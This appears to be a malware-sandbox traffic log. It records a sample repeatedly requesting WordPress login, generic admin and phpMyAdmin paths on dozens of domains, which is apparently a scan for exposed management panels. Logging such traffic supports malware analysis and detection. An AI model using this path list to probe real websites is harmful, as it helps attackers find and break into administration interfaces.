Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://gmaso.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://nrnet.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://6ail.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipCookie: _dhc.651070=853129b2-abbc-49d2-936e-93e4e6ec17aaUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ww42.2mail.com/
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipCookie: _dhc.139992723=30fde576-b761-4503-9a2e-eb69ea07d855User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ww42.onlist.com/
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://z-a.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=3mi2sek3qutmbn6avhslhp5im0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.hul.co.uk/
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: ct.ated.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=3mi2sek3qutmbn6avhslhp5im0User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.hul.co.uk/
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipCookie: PHPSESSID=o21hgt8lseduevueg6o14ge177User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.hul.co.uk/
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: a6a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
